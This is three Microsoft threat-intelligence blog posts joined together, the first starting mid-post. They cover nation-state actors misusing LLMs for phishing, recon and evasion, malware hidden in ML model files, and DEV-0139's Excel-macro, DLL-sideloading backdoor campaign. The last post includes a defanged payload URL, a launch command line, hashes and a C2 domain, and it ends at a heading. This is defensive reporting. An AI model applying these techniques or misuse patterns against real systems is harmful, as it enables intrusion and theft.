• Transparency: As part of our ongoing efforts to advance responsible use of AI, Microsoft will inform the public and stakeholders about actions taken under these threat actor principles, including the nature and extent of threat actors’ use of AI detected within our systems and the measures taken against them, as appropriate.

Microsoft remains committed to responsible AI innovation, prioritizing the safety and integrity of our technologies with respect for human rights and ethical standards. These principles announced today build on Microsoft’s Responsible AI practices, our voluntary commitments to advance responsible AI innovation and the Azure OpenAI Code of Conduct. We are following these principles as part of our broader commitments to strengthening international law and norms and to advance the goals of the Bletchley Declaration endorsed by 29 countries.

Microsoft and OpenAI’s complementary defenses protect AI platforms

Because Microsoft and OpenAI’s partnership extends to security, the companies can take action when known and emerging threat actors surface. Microsoft Threat Intelligence tracks more than 300 unique threat actors, including 160 nation-state actors, 50 ransomware groups, and many others. These adversaries employ various digital identities and attack infrastructures. Microsoft’s experts and automated systems continually analyze and correlate these attributes, uncovering attackers’ efforts to evade detection or expand their capabilities by leveraging new technologies. Consistent with preventing threat actors’ actions across our technologies and working closely with partners, Microsoft continues to study threat actors’ use of AI and LLMs, partner with OpenAI to monitor attack activity, and apply what we learn to continually improve defenses. This blog provides an overview of observed activities collected from known threat actor infrastructure as identified by Microsoft Threat Intelligence, then shared with OpenAI to identify potential malicious use or abuse of their platform and protect our mutual customers from future threats or harm.

Recognizing the rapid growth of AI and emergent use of LLMs in cyber operations, we continue to work with MITRE to integrate these LLM-themed tactics, techniques, and procedures (TTPs) into the MITRE ATT&CK® framework or MITRE ATLAS™ (Adversarial Threat Landscape for Artificial-Intelligence Systems) knowledgebase. This strategic expansion reflects a commitment to not only track and neutralize threats, but also to pioneer the development of countermeasures in the evolving landscape of AI-powered cyber operations. A full list of the LLM-themed TTPs, which include those we identified during our investigations, is summarized in the appendix.

Summary of Microsoft and OpenAI’s findings and threat intelligence

The threat ecosystem over the last several years has revealed a consistent theme of threat actors following trends in technology in parallel with their defender counterparts. Threat actors, like defenders, are looking at AI, including LLMs, to enhance their productivity and take advantage of accessible platforms that could advance their objectives and attack techniques. Cybercrime groups, nation-state threat actors, and other adversaries are exploring and testing different AI technologies as they emerge, in an attempt to understand potential value to their operations and the security controls they may need to circumvent. On the defender side, hardening these same security controls from attacks and implementing equally sophisticated monitoring that anticipates and blocks malicious activity is vital.

While different threat actors’ motives and complexity vary, they have common tasks to perform in the course of targeting and attacks. These include reconnaissance, such as learning about potential victims’ industries, locations, and relationships; help with coding, including improving things like software scripts and malware development; and assistance with learning and using native languages. Language support is a natural feature of LLMs and is attractive for threat actors with continuous focus on social engineering and other techniques relying on false, deceptive communications tailored to their targets’ jobs, professional networks, and other relationships.

Importantly, our research with OpenAI has not identified significant attacks employing the LLMs we monitor closely. At the same time, we feel this is important research to publish to expose early-stage, incremental moves that we observe well-known threat actors attempting, and share information on how we are blocking and countering them with the defender community.

While attackers will remain interested in AI and probe technologies’ current capabilities and security controls, it’s important to keep these risks in context. As always, hygiene practices such as multifactor authentication (MFA) and Zero Trust defenses are essential because attackers may use AI-based tools to improve their existing cyberattacks that rely on social engineering and finding unsecured devices and accounts.

The threat actors profiled below are a sample of observed activity we believe best represents the TTPs the industry will need to better track using MITRE ATT&CK® framework or MITRE ATLAS™ knowledgebase updates.

Forest Blizzard 

Forest Blizzard (STRONTIUM) is a Russian military intelligence actor linked to GRU Unit 26165, who has targeted victims of both tactical and strategic interest to the Russian government. Their activities span across a variety of sectors including defense, transportation/logistics, government, energy, non-governmental organizations (NGO), and information technology. Forest Blizzard has been extremely active in targeting organizations in and related to Russia’s war in Ukraine throughout the duration of the conflict, and Microsoft assesses that Forest Blizzard operations play a significant supporting role to Russia’s foreign policy and military objectives both in Ukraine and in the broader international community. Forest Blizzard overlaps with the threat actor tracked by other researchers as APT28 and Fancy Bear.

Forest Blizzard’s use of LLMs has involved research into various satellite and radar technologies that may pertain to conventional military operations in Ukraine, as well as generic research aimed at supporting their cyber operations. Based on these observations, we map and classify these TTPs using the following descriptions:

• LLM-informed reconnaissance: Interacting with LLMs to understand satellite communication protocols, radar imaging technologies, and specific technical parameters. These queries suggest an attempt to acquire in-depth knowledge of satellite capabilities.
• LLM-enhanced scripting techniques: Seeking assistance in basic scripting tasks, including file manipulation, data selection, regular expressions, and multiprocessing, to potentially automate or optimize technical operations.

Microsoft observed engagement from Forest Blizzard that were representative of an adversary exploring the use cases of a new technology. All accounts and assets associated with Forest Blizzard have been disabled.

Emerald Sleet

Emerald Sleet (THALLIUM) is a North Korean threat actor that has remained highly active throughout 2023. Their recent operations relied on spear-phishing emails to compromise and gather intelligence from prominent individuals with expertise on North Korea. Microsoft observed Emerald Sleet impersonating reputable academic institutions and NGOs to lure victims into replying with expert insights and commentary about foreign policies related to North Korea. Emerald Sleet overlaps with threat actors tracked by other researchers as Kimsuky and Velvet Chollima.

Emerald Sleet’s use of LLMs has been in support of this activity and involved research into think tanks and experts on North Korea, as well as the generation of content likely to be used in spear-phishing campaigns. Emerald Sleet also interacted with LLMs to understand publicly known vulnerabilities, to troubleshoot technical issues, and for assistance with using various web technologies. Based on these observations, we map and classify these TTPs using the following descriptions:

• LLM-assisted vulnerability research: Interacting with LLMs to better understand publicly reported vulnerabilities, such as the CVE-2022-30190 Microsoft Support Diagnostic Tool (MSDT) vulnerability (known as “Follina”).
• LLM-enhanced scripting techniques: Using LLMs for basic scripting tasks such as programmatically identifying certain user events on a system and seeking assistance with troubleshooting and understanding various web technologies.
• LLM-supported social engineering: Using LLMs for assistance with the drafting and generation of content that would likely be for use in spear-phishing campaigns against individuals with regional expertise.
• LLM-informed reconnaissance: Interacting with LLMs to identify think tanks, government organizations, or experts on North Korea that have a focus on defense issues or North Korea’s nuclear weapon’s program.

All accounts and assets associated with Emerald Sleet have been disabled.

Crimson Sandstorm

Crimson Sandstorm (CURIUM) is an Iranian threat actor assessed to be connected to the Islamic Revolutionary Guard Corps (IRGC). Active since at least 2017, Crimson Sandstorm has targeted multiple sectors, including defense, maritime shipping, transportation, healthcare, and technology. These operations have frequently relied on watering hole attacks and social engineering to deliver custom .NET malware. Prior research also identified custom Crimson Sandstorm malware using email-based command-and-control (C2) channels. Crimson Sandstorm overlaps with the threat actor tracked by other researchers as Tortoiseshell, Imperial Kitten, and Yellow Liderc.

The use of LLMs by Crimson Sandstorm has reflected the broader behaviors that the security community has observed from this threat actor. Interactions have involved requests for support around social engineering, assistance in troubleshooting errors, .NET development, and ways in which an attacker might evade detection when on a compromised machine. Based on these observations, we map and classify these TTPs using the following descriptions:

• LLM-supported social engineering: Interacting with LLMs to generate various phishing emails, including one pretending to come from an international development agency and another attempting to lure prominent feminists to an attacker-built website on feminism. 
• LLM-enhanced scripting techniques: Using LLMs to generate code snippets that appear intended to support app and web development, interactions with remote servers, web scraping, executing tasks when users sign in, and sending information from a system via email.
• LLM-enhanced anomaly detection evasion: Attempting to use LLMs for assistance in developing code to evade detection, to learn how to disable antivirus via registry or Windows policies, and to delete files in a directory after an application has been closed.

All accounts and assets associated with Crimson Sandstorm have been disabled.

Charcoal Typhoon

Charcoal Typhoon (CHROMIUM) is a Chinese state-affiliated threat actor with a broad operational scope. They are known for targeting sectors that include government, higher education, communications infrastructure, oil & gas, and information technology. Their activities have predominantly focused on entities within Taiwan, Thailand, Mongolia, Malaysia, France, and Nepal, with observed interests extending to institutions and individuals globally who oppose China’s policies. Charcoal Typhoon overlaps with the threat actor tracked by other researchers as Aquatic Panda, ControlX, RedHotel, and BRONZE UNIVERSITY.

In recent operations, Charcoal Typhoon has been observed interacting with LLMs in ways that suggest a limited exploration of how LLMs can augment their technical operations. This has consisted of using LLMs to support tooling development, scripting, understanding various commodity cybersecurity tools, and for generating content that could be used to social engineer targets. Based on these observations, we map and classify these TTPs using the following descriptions:

• LLM-informed reconnaissance: Engaging LLMs to research and understand specific technologies, platforms, and vulnerabilities, indicative of preliminary information-gathering stages.
• LLM-enhanced scripting techniques: Utilizing LLMs to generate and refine scripts, potentially to streamline and automate complex cyber tasks and operations.
• LLM-supported social engineering: Leveraging LLMs for assistance with translations and communication, likely to establish connections or manipulate targets.
• LLM-refined operational command techniques: Utilizing LLMs for advanced commands, deeper system access, and control representative of post-compromise behavior.

All associated accounts and assets of Charcoal Typhoon have been disabled, reaffirming our commitment to safeguarding against the misuse of AI technologies.

Salmon Typhoon

Salmon Typhoon (SODIUM) is a sophisticated Chinese state-affiliated threat actor with a history of targeting US defense contractors, government agencies, and entities within the cryptographic technology sector. This threat actor has demonstrated its capabilities through the deployment of malware, such as Win32/Wkysol, to maintain remote access to compromised systems. With over a decade of operations marked by intermittent periods of dormancy and resurgence, Salmon Typhoon has recently shown renewed activity. Salmon Typhoon overlaps with the threat actor tracked by other researchers as APT4 and Maverick Panda.

Notably, Salmon Typhoon’s interactions with LLMs throughout 2023 appear exploratory and suggest that this threat actor is evaluating the effectiveness of LLMs in sourcing information on potentially sensitive topics, high profile individuals, regional geopolitics, US influence, and internal affairs. This tentative engagement with LLMs could reflect both a broadening of their intelligence-gathering toolkit and an experimental phase in assessing the capabilities of emerging technologies.

Based on these observations, we map and classify these TTPs using the following descriptions:

• LLM-informed reconnaissance: Engaging LLMs for queries on a diverse array of subjects, such as global intelligence agencies, domestic concerns, notable individuals, cybersecurity matters, topics of strategic interest, and various threat actors. These interactions mirror the use of a search engine for public domain research.
• LLM-enhanced scripting techniques: Using LLMs to identify and resolve coding errors. Requests for support in developing code with potential malicious intent were observed by Microsoft, and it was noted that the model adhered to established ethical guidelines, declining to provide such assistance.
• LLM-refined operational command techniques: Demonstrating an interest in specific file types and concealment tactics within operating systems, indicative of an effort to refine operational command execution.
• LLM-aided technical translation and explanation: Leveraging LLMs for the translation of computing terms and technical papers.

Salmon Typhoon’s engagement with LLMs aligns with patterns observed by Microsoft, reflecting traditional behaviors in a new technological arena. In response, all accounts and assets associated with Salmon Typhoon have been disabled.

In closing, AI technologies will continue to evolve and be studied by various threat actors. Microsoft will continue to track threat actors and malicious activity misusing LLMs, and work with OpenAI and other partners to share intelligence, improve protections for customers and aid the broader security community.

Appendix: LLM-themed TTPs

Using insights from our analysis above, as well as other potential misuse of AI, we’re sharing the below list of LLM-themed TTPs that we map and classify to the MITRE ATT&CK® framework or MITRE ATLAS™ knowledgebase to equip the community with a common taxonomy to collectively track malicious use of LLMs and create countermeasures against:

• LLM-informed reconnaissance: Employing LLMs to gather actionable intelligence on technologies and potential vulnerabilities.
• LLM-enhanced scripting techniques: Utilizing LLMs to generate or refine scripts that could be used in cyberattacks, or for basic scripting tasks such as programmatically identifying certain user events on a system and assistance with troubleshooting and understanding various web technologies.
• LLM-aided development: Utilizing LLMs in the development lifecycle of tools and programs, including those with malicious intent, such as malware.
• LLM-supported social engineering: Leveraging LLMs for assistance with translations and communication, likely to establish connections or manipulate targets.
• LLM-assisted vulnerability research: Using LLMs to understand and identify potential vulnerabilities in software and systems, which could be targeted for exploitation.
• LLM-optimized payload crafting: Using LLMs to assist in creating and refining payloads for deployment in cyberattacks.
• LLM-enhanced anomaly detection evasion: Leveraging LLMs to develop methods that help malicious activities blend in with normal behavior or traffic to evade detection systems.
• LLM-directed security feature bypass: Using LLMs to find ways to circumvent security features, such as two-factor authentication, CAPTCHA, or other access controls.
• LLM-advised resource development: Using LLMs in tool development, tool modifications, and strategic operational planning.

Learn more

Read the sixth edition of Cyber Signals, spotlighting how we are protecting AI platforms from emerging threats related to nation-state cyberthreat actors: Navigating cyberthreats and strengthening defenses in the era of AI.

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post Staying ahead of threat actors in the age of AI appeared first on Microsoft Security Blog.

Brad Smith recently pointed out that 2023 will likely mark the inflection point for AI going mainstream, the same way we think of 1995 for browsing the internet or 2007 for the smartphone revolution. And while Brad outlines some major opportunities for AI across industries, he also calls out the deep responsibility involved for those who develop these technologies. One of the biggest opportunities is also a core responsibility for us at Microsoft – building a more secure digital future. AI has the incredible potential to reshape our security landscape and protect organizations and people in ways we have been unable to do in the past.

With all of AI’s potential to empower people and organizations, it also comes with risks that the security community must address. It is imperative that we as an industry and global technology community get this journey right, and that means looking at AI with diverse perspectives, taking it slowly, working with our partners across government and industry – and sharing what we’re learning.

At Microsoft, we’ve been working on the challenges and opportunities of AI for years. Today we’re sharing some recent developments so that the community can be better informed and better equipped for a new world of AI exploration:

• New research: A dedicated AI Security Red Team within Microsoft Threat Intelligence explored how traditional software threats affect AI and how security professionals, developers, and machine learning engineers should think about securing and monitoring AI and machine learning models. This team will continue to research and test security in AI and machine learning as we learn more as a company and as an industry.

• New tools for defenders: Microsoft recently released an open-source automation tool for security testing of AI systems called Counterfit. The tool is designed to help organizations conduct AI security risk assessments and help ensure that the algorithms used in their businesses are robust, reliable, and trustworthy. As of today, our Counterfit tool will now be part of MITRE’s new Arsenal plug-in.

• Industry collaboration to help secure the AI supply chain: We worked with Hugging Face, one of the most popular machine learning model repositories, to mitigate threats to AI and machine learning frameworks by collaborating on an AI-specific security scanner. This tool will help the security community to better secure their software supply chain when it comes to AI and machine learning.

AI brings new capabilities – and familiar risks

AI and machine learning can provide remarkable efficiency gains for organizations and lift the burden from a work force overwhelmed by data.

As an example, these capabilities can be particularly helpful in cybersecurity. There are more than 1,200 brute-force password attacks per second, and according to McKinsey, many organizations have more than 100 security tools in place, each with its own portal and alerting system to be checked daily. AI will change the way we defend against threats by improving our ability to protect and respond at the speed of an attack.

This is why AI is popular right now across industries: it provides a way to solve sophisticated problems utilizing complex data relationships merely by human labeling of input and output examples. It uses the inherent advantages of computing to lift the burden of massive data and speed our path to insights and discoveries.

But with its capabilities, AI also brings some risks that organizations may not be considering. Many businesses are pulling existing models from public AI and machine learning repositories as they work to apply AI models to their own operations. But often, either the software used to build AI systems or the AI models housed in the repositories have not been moderated. This creates the risk that anyone can put up a tampered model for consumption, which can poison any system that uses the model.

There is a misconception in the security community that attacking AI and machine learning systems involves exotic algorithms and advanced knowledge of machine learning. But while machine learning may seem like math and magic, at the core it runs on bits and bytes, and like all software, it can be vulnerable to security issues.

Within the Microsoft Threat Intelligence team, we have a group that focuses on understanding these risks. The AI Security Red Team is an interdisciplinary group of security researchers, machine learning engineers, and software engineers whose goal is to proactively identify failure points in AI systems and help remediate them. The AI Security Red Team works to see how attackers approach AI and how they might be able to compromise an AI or machine learning model, so we can understand those attacks and how to get ahead of them.

The research: Old threats take on new life with AI

Recently the AI Security Red Team investigated how easy it would be for an attacker to inject malicious code into AI and machine learning model repositories. Their central question was, how can an adversary with current-day, traditional hacking skills cause harm to AI systems? This question led us to prove that traditional software attack vectors can indeed be a threat.

The security community has long known about Python serialization threats, but not in the context of AI systems. Academic researchers have warned about the lack of security practices in machine learning software. Recently, there has been a wave of research (for example, here, here, and here) looking at serialization threats specifically in the context of machine learning. MITRE ATLAS, the ATT&CK-style framework for adversarial machine learning, specifically calls out machine learning supply chain compromise. Even AI frameworks’ security documentation explicitly points out that machine learning model files are designed to store generic programs.

What has been less clear is how far attackers could take this, which is what the Microsoft AI Security Red Team explored. The AI Security Red Team routinely emulates a range of adversaries, from script kiddies to advanced attackers, to understand attack vectors against AI and machine systems. To answer our question, we assumed the role of an adversary whose goal is to compromise machine learning systems using only traditional hacking tools and methodology. In other words, our adversary knew nothing about specifically hacking AI.

Our exercise allowed us to assess the impact of poor encryption in machine learning endpoints, improperly configured machine learning workspaces and environments, and overly broad permissions in the storage accounts containing the machine learning model and training data – all of which can be thought of as traditional software threats.

The team found that these traditional software threats can be particularly impactful in the context of AI systems. We looked at two of the AI frameworks most widely used by machine learning engineers and data scientists. These frameworks provide a convenient way to write mathematical expressions to transform data into the required format before running it through an algorithm. The team was able to repurpose one such function, Keras Lambda layer, to inject arbitrary code.

The security community is aware of how Python’s pickle module, which is used for serialization and deserialization of a python object, can be abused by adversaries. Our work, however, shows that machine learning model file formats, which may not use pickle format, are still flexible enough to store generic programs and can be abused. This also reduces the number of steps the adversary needs to include a backdoor in a model released to the internet or a popular repository. 

In our proof of concept, we were able to repurpose the mathematical expression processing function to load malware. An added advantage to the adversary: the attack is self-contained and stealthy; it does not require loading extra custom code prior to loading the model itself.

New tools with Counterfit, CALDERA, and ATLAS

In security, we are constantly investing and innovating to learn about attacker behaviors and bring that human-led intelligence to our products. Our mission is to combine the diversity of thinking and experience from our threat hunters and companies we’ve integrated with (like RiskIQ and CyberX), so our customers can benefit from both hyper-scale threat intelligence as well as AI.

With our announcement today that Microsoft Counterfit is now integrated into MITRE CALDERA, security professionals can now build threat profiles to probe how an adversary can attack AI systems both via traditional methods as well as through novel machine learning techniques.

This new tool integration brings together Microsoft Counterfit, MITRE CALDERA (the de facto tool for adversary emulation), and MITRE ATLAS to help security practitioners better understand threats to ML systems. This will enable security teams to proactively look for weaknesses in AI and machine learning models and fix them before an attacker can take advantage. Now security professionals can get a holistic and automated security assessment of their AI systems using a tool that they are already familiar with.

“With the rise in real world attacks on machine learning systems that we’ve seen through the MITRE ATLAS collaboration, it’s more important than ever to create actionable tools for security professionals to prepare for these growing threats across the globe. We are thrilled to release a new adversary emulation tool, Arsenal, in partnership with Microsoft and their Counterfit team. These open-sourced tools will enhance the ability of security professionals and ML engineers across the community to test the vulnerability of their ML models through the MITRE CALDERA tools they already know and love.”

Doug Robbins, VP Engineering & Prototyping, MITRE

Investment and innovation with partners

In theory, once a machine learning model is embedded with malware, it can be posted in popular ML hosting repositories for anyone to download. An unsuspecting ML engineer could then download the backdoored ML model, which could lead to the adversary gaining foothold into the organization environment.

To help prevent this, we worked with Hugging Face, one of the most popular ML model repositories, to mitigate such threats by collaborating on an AI-specific security scanner.

We also recommend Software Bill of Materials (SBOM) for AI systems. We have amended the package URL (purl) specification to include Hugging Face, as well as MLFlow. Software Package Data Exchange (SPDX) and CycloneDX, the leading SBOM standards which leverage purl spec, allow tracking of ML models. Now any Azure ML, Databricks, or Hugging Face user leveraging Microsoft’s recommended SBOM will have the option to track ML models as part of supply chain security. 

Threat Intelligence in this space will continue to be a team sport, which is why we have partnered with MITRE and 11 other organizations to empower security professionals to track these novel forms of attack via the MITRE ATLAS initiative.

Given we distribute hundreds of millions of ML models every month, corrupted artifacts can cause great harm as well as damage the trust in the open-source community. This is why we at Hugging Face actively develop tools to empower users of our platform to secure their artefacts, and greatly appreciate Microsoft’s community contributions in advancing the security of ML models.

Luc Georges, ML Engineer, Hugging Face

It’s imperative that we as an industry and global technology community are thoughtful and diligent in our approach to securing AI and machine learning systems. At Microsoft, this is core to our focus on AI and our security culture. Because of the nature of emerging technology, in that it’s exactly that – emerging – there are many unknowns. In security, we are constantly investing and innovating to learn about attacker behaviors and bring that human-led intelligence to our products.

The reason we invest in research, tools and industry partnerships like those we’re announcing today is so we can understand the nature of what those attacks would entail, do our best to get ahead of them, and help others in the security community do the same. There is still so much to learn about AI, and we are continuously investing across our platforms and in red-team like research to learn about this technology and to help inform how it will be integrated into our platform and products.

Recommendations and resources

The following recommendations for security professionals can help minimize the risks for AI and ML systems:

1. Encourage ML engineers to inventory, track and update ML models by leveraging model registries. This will help with keeping track of the models in an organization and their software dependencies.
2. Apply existing security best practices to AI systems. This includes sandboxing the environment running ML models via containers and machine virtualization, network monitoring, and firewalls. We have outlined guidance here to get started. By doing this, we treat AI assets as yet another crown jewel that security teams should protect from adversaries.
3. Leverage MITRE ATLAS to understand threats to AI systems, and emulate them using Microsoft Counterfit via MITRE CALDERA. This will help security analysts ground their effort in a realistic, numbers-driven approach to protecting AI systems.

This proof of concept that we pursued is part of broader investment at Microsoft to empower the wide range of stakeholders who play an important role to securely develop and deploy AI systems:

• For security analysts to orient themselves with threats against AI systems, Microsoft, in collaboration with MITRE, released an ATT&CK-style framework Adversarial ML Threat Matrix, complete with case studies of attacks on production machine learning systems, which has evolved into MITRE ATLAS.
• For security professionals, Microsoft open-sourced Counterfit to help with assessing the posture of AI systems.
• For security incident responders, we released a bug bar to systematically triage attacks on ML systems.
• For ML engineers, we released a checklist to complete AI risk assessment.
• For developers, we released threat modeling guidance specifically for ML systems.
• For engineers and policymakers, Microsoft, in collaboration with Berkman Klein Center at Harvard University, released a taxonomy documenting various machine learning failure modes.
• For the broader security community, Microsoft hosted the annual Machine Learning Evasion Competition.
• For Azure machine learning customers, we provided guidance on enterprise security and governance.

Contributors: Ram Shankar Siva Kumar with Gary Lopez Munoz, Matthieu Maitre, Amanda Minnich, Shiven Chawla, Raja Sekhar Rao Dheekonda, Lu Zhang, Charlotte Siska, Sudipto Rakshit.

The post New research, tooling, and partnerships for more secure AI and machine learning appeared first on Microsoft Security Blog.

April 2023 update – Microsoft Threat Intelligence has shifted to a new threat actor naming taxonomy aligned around the theme of weather. DEV-0139 is now tracked as Citrine Sleet.

To learn about how the new taxonomy represents the origin, unique traits, and impact of threat actors, and to get a complete mapping of threat actor names, read this blog: Microsoft shifts to a new threat actor naming taxonomy.

Over the past several years, the cryptocurrency market has considerably expanded, gaining the interest of investors and threat actors. Cryptocurrency itself has been used by cybercriminals for their operations, notably for ransom payment in ransomware attacks, but we have also observed threat actors directly targeting organizations within the cryptocurrency industry for financial gain. Attacks targeting this market have taken many forms, including fraud, vulnerability exploitation, fake applications, and usage of info stealers, as attackers attempt to get their hands on cryptocurrency funds.

We are also seeing more complex attacks wherein the threat actor shows great knowledge and preparation, taking steps to gain their target’s trust before deploying payloads. For example, Microsoft recently investigated an attack where the threat actor, tracked as DEV-0139, took advantage of Telegram chat groups to target cryptocurrency investment companies. DEV-0139 joined Telegram groups used to facilitate communication between VIP clients and cryptocurrency exchange platforms and identified their target from among the members. The threat actor posed as representatives of another cryptocurrency investment company, and in October 2022 invited the target to a different chat group and pretended to ask for feedback on the fee structure used by cryptocurrency exchange platforms. The threat actor had a broader knowledge of this specific part of the industry, indicating that they were well prepared and aware of the current challenge the targeted companies may have.

After gaining the target’s trust, DEV-0139 then sent a weaponized Excel file with the name OKX Binance & Huobi VIP fee comparision.xls which contained several tables about fee structures among cryptocurrency exchange companies. The data in the document was likely accurate to increase their credibility. This weaponized Excel file initiates the following series of activities:

1. A malicious macro in the weaponized Excel file abuses UserForm of VBA to obfuscate the code and retrieve some data.
2. The malicious macro drops another Excel sheet embedded in the form and executes it in invisible mode. The said Excel sheet is encoded in base64, and dropped into C:\ProgramData\Microsoft Media\ with the name VSDB688.tmp
3. The file VSDB688.tmp downloads a PNG file containing three executables: a legitimate Windows file named logagent.exe, a malicious version of the DLL wsock32.dll, and an XOR encoded backdoor.
4. The file logagent.exe is used to sideload the malicious wsock32.dll, which acts as a DLL proxy to the legitimate wsock32.dll. The malicious DLL file is used to load and decrypt the XOR encoded backdoor that lets the threat actor remotely access the infected system.

Further investigation through our telemetry led to the discovery of another file that uses the same DLL proxying technique. But instead of a malicious Excel file, it is delivered in an MSI package for a CryptoDashboardV2 application, dated June 2022. This may suggest other related campaigns are also run by the same threat actor, using the same techniques.

In this blog post, we will present the details uncovered from our investigation of the attack against a cryptocurrency investment company, as well as analysis of related files, to help similar organizations understand this kind of threat, and prepare for possible attacks. Researchers at Volexity recently published their findings on this attack as well.

As with any observed nation state actor activity, Microsoft directly notifies customers that have been targeted or compromised, providing them with the information they need to secure their accounts. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or a developing cluster of threat activity, allowing Microsoft Threat Intelligence Center (MSTIC) to track it as a unique set of information until we reach a high confidence about the origin or identity of the actor behind the activity. Once it meets the criteria, a DEV is converted to a named actor.

Initial compromise

To identify the targets, the threat actor sought out members of cryptocurrency investment groups on Telegram. In the specific attack, DEV-0139 got in touch with their target on October 19, 2022 by creating a secondary Telegram group with the name <NameOfTheTargetedCompany> <> OKX Fee Adjustment and inviting three employees. The threat actor created fake profiles using details from employees of the company OKX. The screenshot below shows the real accounts and the malicious ones for two of the users present in the group.

It’s worth noting that the threat actor appears to have a broad knowledge of the cryptocurrency industry and the challenges the targeted company may face. The threat actor asked questions about fee structures, which are the fees used by crypto exchange platforms for trading. The fees are a big challenge for investment funds as they represent a cost and must be optimized to minimize impact on margin and profits. Like many other companies in this industry, the largest costs come from fees charged by exchanges. This is a very specific topic that demonstrates how the threat actor was advanced and well prepared before contacting their target.

After gaining the trust of the target, the threat actor sent a weaponized Excel document to the target containing further details on the fees to appear legitimate. The threat actor used the fee structure discussion as an opportunity to ask the target to open the weaponized Excel file and fill in their information.

Weaponized Excel file analysis

The weaponized Excel file, which has the file name OKX Binance & Huobi VIP fee comparision.xls (Sha256: abca3253c003af67113f83df2242a7078d5224870b619489015e4fde060acad0), is well crafted and contains legitimate information about the current fees used by some crypto exchanges. The metadata extracted showed that the file was created by the user Wolf:

The macro is obfuscated and abuses UserForm (a feature used to create windows) to store data and variables. In this case, the name of the UserForm is IFUZYDTTOP, and the macro retrieves the information with the following code IFUZYDTTOP.MgQnQVGb.Caption where MgQnQVGb is the name of the label in the UserForm and .caption allows to retrieve the information stored into the UserForm.

The table below shows the data retrieved from the UserForm:

The macro retrieves some parameters from the UserForm as well as another XLS file stored in base64. The XLS file is dropped into the directory C:\ProgramData\Microsoft Media as VSDB688.tmp and runs in invisible mode.

Additionally, the main sheet in the Excel file is protected with the password dragon to encourage the target to enable the macros. The sheet is then unprotected after installing and running the other Excel file stored in Base64. This is likely used to trick the user to enable macros and not raise suspicion.

Extracted worksheet

The second Excel file, VSDB688.tmp (Sha256: a2d3c41e6812044573a939a51a22d659ec32aea00c26c1a2fdf7466f5c7e1ee9), is used to retrieve a PNG file that is parsed later by the macro to extract two executable files and the encrypted backdoor. Below is the metadata for the second worksheet:

The table below shows the deobfuscated data retrieved from the UserForm:

The macro retrieves some parameters from the UserForm then downloads a PNG file from hxxps://od.lk/d/d021d412be456a6f78a0052a1f0e3557dcfa14bf25f9d0f1d0d2d7dcdac86c73/Background.png. The file was no longer available at the time of analysis, indicating that the threat actor likely deployed it only for this specific attack.

The PNG is then split into three parts and written in three different files: the legitimate file logagent.exe, a malicious version of wsock32.dll, and the XOR encrypted backdoor with the GUID (56762eb9-411c-4842-9530-9922c46ba2da). The three files are used to load the main payload to the target system.

Loader analysis

Two of the three files extracted from the PNG file, logagent.exe and wsock32.dll, are used to load the XOR encrypted backdoor. The following sections present our in-depth analysis of both files.

Logagent.exe

Logagent.exe (Hash: 8400f2674892cdfff27b0dfe98a2a77673ce5e76b06438ac6110f0d768459942) is a legitimate system application used to log errors from Windows Media Player and send the information for troubleshooting.

The file contains the following metadata, but it is not signed:

The logagent.exe imports function from the wsock32.dll which is abused by the threat actor to load malicious code into the targeted system. To trigger and run the malicious wsock32.dll, logagent.exe is run with the following arguments previously retrieved by the macro: 56762eb9-411c-4842-9530-9922c46ba2da /shadow. Both arguments are then retrieved by wsock32.dll. The GUID 56762eb9-411c-4842-9530-9922c46ba2da is the filename for the malicious wsock32.dll to load and /shadow is used as an XOR key to decrypt it. Both parameters are needed for the malware to function, potentially hindering isolated analysis.

Wsock32.dll

The legitimate wsock32.dll is the Windows Socket API used by applications to handle network connections. In this attack, the threat actor used a malicious version of wsock32.dll to evade detection. The malicious wsock32.dll is loaded by logagent.exe through DLL side-loading and uses DLL proxying to call the legitimate functions from the real wsock32.dll and avoid detection. DLL proxying is a hijacking technique where a malicious DLL sits in between the application calling the exported function and a legitimate DLL that implements that exported function. In this attack, the malicious wsock32.dll acts as a proxy between logagent.exe and the legitimate wsock32.dll.

It is possible to notice that the DLL is forwarding the call to the legitimate functions by looking at the import address table:

When the malicious wsock32.dll is loaded, it first retrieves the command line, and checks if the file with the GUID as a filename is present in the same directory using the CreateFile API to retrieve a file handle.

The malicious wsock32.dll loads and decodes the final implant into the memory with the GUID name which is used to remote access the infected machine.

Once the file is loaded into the memory, it gives remote access to the threat actor. At the time of the analysis, we could not retrieve the final payload. However, we identified another variant of this attack and retrieved the payload, which is discussed in the next section. Identified implants were connecting back to the same command-and-control (C2) server.

Related attack

We identified another file using a similar mechanism as logagent.exe and delivering the same payload. The loader is packaged as an MSI package and as posed an application called CryptoDashboardV2 (Hash: e5980e18319027f0c28cd2f581e75e755a0dace72f10748852ba5f63a0c99487). After installing the MSI, it uses a legitimate application called tplink.exe to sideload the malicious DLL called DUser.dll and uses  DLL proxying as well.

Once the package is installed, it runs and side-loads the DLL using the following command: C:\Users\user\AppData\Roaming\Dashboard_v2\TPLink.exe” 27E57D84-4310-4825-AB22-743C78B8F3AA /sven, where it noticeably uses a different GUID.

Further analysis of the malicious DUser.dll showed that its original name is also HijackingLib.dll, same as the malicious wsock32.dll. This could indicate the usage of the same tool to create these malicious DLL proxies. Below are the file details of DUser.dll:

Once the DLL is running, it loads and decodes the implant in the memory and starts beaconing the same domain. In that case, the implant is using the GUID name 27E57D84-4310-4825-AB22-743C78B8F3AA and the XOR key /sven.

Implant analysis

The payload decoded in the memory by the malicious DLL is an implant used by the threat actor to remotely access the compromised machine. We were able to get the one from the second variant we uncovered. Below are the details of the payload:

First, the sample retrieves some information from the targeted system. It can connect back to a remote server and receive commands from it.

Infrastructure

It is interesting to notice that the threat actor abused OpenDrive in one of the variants to deliver the payload. The OpenDrive account has been set up quickly for a one shot, indicating that it was created for only one target.

We identified one domain used as C2 server, strainservice[.]com and connected back to the two implants. This domain was registered on June 26 on Namecheap, just before the distribution of the first variant. At the time of the attack, the server had port 80, 443, and 2083. The implants were communicated on port 443.

Defending against targeted attacks

